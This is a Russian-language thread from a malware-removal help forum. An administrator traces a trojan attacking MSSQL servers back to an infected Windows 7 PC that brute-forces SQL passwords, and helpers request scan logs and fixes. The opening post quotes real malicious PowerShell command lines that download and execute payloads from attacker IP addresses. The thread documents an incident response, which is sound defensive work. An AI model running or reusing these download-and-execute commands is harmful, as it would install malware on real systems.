Xxandr 0 Опубликовано 11 апреля Share Опубликовано 11 апреля Доброго дня! Защитник (Trojan:Win32/HijackSQLServer.AB) на Win 2016 ликвидирует вот такие критические угрозы. (скриншот 1 и 2) За день таких попыток вредоносное ПО предпринимает несколько раз. Процесс запускается от пользователя MSSQLSERVER. В случае Win 2008 и с антивирусом Symantec (ISB.Downloader!gen173) также фиксируются и ликвидируются эти угрозы (скриншот 3), однако уже от пользователя NETWORK SERVICE. В предыдущий раз когда эта проблема была на 2012 винде без антивируса, то эффект был в виде заполнения озу множественными процессами powershell с параметрами типа CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png CmdLine:C:\Windows\System32\cmd.exe /c powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://111.47.22.111:10521/57BC9B7E.Png');MsiMake http://111.47.22.111:10521/0CFA042F.Png CmdLine:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://213.59.119.150:14251/57BC9B7E.Png');MsiMake http://213.59.119.150:14251/0CFA042F.Png Пожалуйста, помогите побороть эту беду. Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 172 Опубликовано 11 апреля Share Опубликовано 11 апреля Здравствуйте! Прочтите и выполните Порядок оформления запроса о помощи Цитата Ссылка на сообщение Поделиться на другие сайты
Xxandr 0 Опубликовано 13 апреля Автор Share Опубликовано 13 апреля 1. Проверка с помощью Kaspersky Virus Removal Tool выявила вот такую угрозу (скриншот 1). 2. Прикрепил лог CollectionLog-2023.04.13-09.51.zip Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 172 Опубликовано 13 апреля Share Опубликовано 13 апреля Дополнительно, пожалуйста: Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе. Когда программа запустится, нажмите Да для соглашения с предупреждением. Нажмите кнопку Сканировать (Scan). После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. Цитата Ссылка на сообщение Поделиться на другие сайты
Xxandr 0 Опубликовано 13 апреля Автор Share Опубликовано 13 апреля Готово Addition.txt FRST.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 172 Опубликовано 13 апреля Share Опубликовано 13 апреля Разрешения на эти порты задавали самостоятельно? Цитата FirewallRules: [{ACDD6BAE-354C-4C3A-A625-07BF69EA9595}] => (Allow) LPort=1303 FirewallRules: [{6D9143FF-6E7F-4AE7-815F-886CE4C1BBEC}] => (Allow) LPort=3381 FirewallRules: [{58CFFC2A-D66F-4D54-B494-1E56BA28AEC3}] => (Allow) LPort=475 FirewallRules: [{04F6DEBB-AF2C-4E9B-9056-F5AD7F131722}] => (Allow) LPort=475 Цитата Ссылка на сообщение Поделиться на другие сайты
Xxandr 0 Опубликовано 13 апреля Автор Share Опубликовано 13 апреля 25 минут назад, Sandor сказал: Разрешения на эти порты задавали самостоятельно? да. все были сделаны принудительно. Но сейчас вижу что часть из них уже неактуальна, например 475 - правило для этого порта закрываю. А для остальных я сделаю более детальное правила: добавлю приложения, которые эксплуатируют эти порты. Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 172 Опубликовано 13 апреля Share Опубликовано 13 апреля Да, сделайте это. И некоторое время подождите, попросил подключиться коллегу. Цитата Ссылка на сообщение Поделиться на другие сайты
Xxandr 0 Опубликовано 14 апреля Автор Share Опубликовано 14 апреля (изменено) ещё одно наблюдение. Я посмотрел время и дни в журналах Symantec. И оказывается что: - первая угроза происходит в начале рабочего дня - с 7 до 8 утра. А последняя в конце рабочего дня. Но некоторые сотрудники у нас заканчивают работу по разному: с 15:00 и до 17:00 крайняя ликвидированная угроза за день. - атаки не происходят на выходных, когда в офисе на 99% нет ПК-юзеров Завтра проведу эксперимент с поочерёдным включением наиболее подозрительных станций. Изменено 14 апреля пользователем Xxandr Цитата Ссылка на сообщение Поделиться на другие сайты
Xxandr 0 Опубликовано 14 апреля Автор Share Опубликовано 14 апреля Ещё. Решил поизучать журнал SQL сервера. Оказалось, что в тоже самое время (+/- 1 минута) в журнале зафиксированы неудачные попытки подключения к серверу с одного из ПК, который уже изолирован от сети. Неудача заключается в неправильном пароле. Однако, скорее всего работает перебор паролей, где вирусное ПО всё же подбирает актуальный пароль и осуществляет атаку. Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 172 Опубликовано 14 апреля Share Опубликовано 14 апреля 1 минуту назад, Xxandr сказал: одного из ПК Если в сети нет централизованного управления защитой, пройдитесь на каждом ПК хотя бы KVRT. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
Xxandr 0 Опубликовано 15 апреля Автор Share Опубликовано 15 апреля Итак, как и ожидалось, виновник - клиент (ПК) из журнала MSSQL. Причём, это самый обычный ПК юзера для RDP-сеансов, Windows 7. После его отключения от сети атаки прекратились. Запустил на нём KVRT. Найдена вот такая беда - скриншот 1. В карантин не копируется, видимо из-за занятости его системой. Сам файл отсутствует по такому пути C:\Windows\System32\MsB9AB2A36App.dll даже при активации скрытых элементов. Хотя, при повторной проверке KVRT он там находится, судя по отчёту. А ещё KMS драйвер был замечен, и тоже в SYSTEM32. Файлы отчёта прикрепляю. reports.zip Цитата Ссылка на сообщение Поделиться на другие сайты
thyrex 1 377 Опубликовано 15 апреля Share Опубликовано 15 апреля Логи по правилам соберите на той машине. Цитата Ссылка на сообщение Поделиться на другие сайты
Xxandr 0 Опубликовано 15 апреля Автор Share Опубликовано 15 апреля Готово. Спасибо вам за помощь! CollectionLog-2023.04.15-13.07.zip Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 828 Опубликовано 20 апреля Share Опубликовано 20 апреля Здравствуйте, HiJackThis (из каталога autologger) профикситьВажно: необходимо отметить и профиксить только то, что указано ниже. O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2022/10/03) - {1051322c-8577-42f9-8328-f7d5fbb84970} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS. Могли бы также проверить пожалуйста, если в вашей базе-данных не появились странные пользователи или задачи? Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.